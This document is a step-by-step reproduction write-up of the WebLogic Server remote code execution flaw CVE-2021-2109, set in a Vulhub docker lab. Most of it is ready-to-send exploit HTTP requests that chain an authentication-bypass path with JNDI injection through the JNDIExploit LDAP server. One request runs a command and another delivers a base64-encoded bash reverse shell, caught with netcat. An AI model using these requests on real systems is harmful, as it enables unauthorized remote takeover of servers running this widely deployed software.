CVE-2021-2109 Weblogic Server Remote Code Execution
Vulnerability background
On January 20, 2021, Oracle officially released a vulnerability patch, fixing multiple high-risk and serious vulnerabilities including the CVE-2021-2109 Weblogic Server remote code execution vulnerability. In CVE-2021-2109, attackers can construct malicious requests, cause JNDI injection, execute arbitrary code, and control the server. This vulnerability is a remote code execution vulnerability of Weblogic, which is mainly injected by JNDI, allowing attackers to exploit this vulnerability for remote code execution, with a high risk level.
The version affected by the vulnerability
-
Weblogic Server 10.3.6.0.0
-
Weblogic Server 12.1.3.0.0
-
Weblogic Server 12.2.1.3.0
-
Weblogic Server 12.2.1.4.0
-
Weblogic Server 14.1.1.0.0
Vulnerability recurrence
Environment build
Use Vulhub's CVE-2020-14882 vulnerability environment to reproduce, and start the vulnerability environment as follows.
download environment
docker-compose up -d
Check if the environment is started
docker ps
Visit the target address to get the following page:
Using CVE-2020-14882 unauthorized access to the login background, unauthorized URL address:
http://192.168.106.6:7001/console/css/%252e%252e%252fconsole.portal
command execution
Enable JNDI monitoring
java -jar JNDIExploit-v1.11.jar -i 192.168.106.1(本机IP)
BP sends packets
POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.106;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.106.6:7001
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
cmd:id
Cookie: rememberMe=1; ADMINCONSOLESESSION=SHZ2XSBhINTtK05OkiYc3YmbENIp5MODNGWF7EaAje_adp2PQ58L!-286302025; rememberMe=1
Connection: close
You can see that our command was executed successfully.
rebound shell
POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.106;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.106.6:7001
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
cmd:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwNi4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}
Cookie: rememberMe=1; ADMINCONSOLESESSION=SHZ2XSBhINTtK05OkiYc3YmbENIp5MODNGWF7EaAje_adp2PQ58L!-286302025; rememberMe=1
Connection: close
This machine listens on port 4444
netcat -lvp 4444
It can be seen that we have listened to the reverse shell locally, and then successfully executed our command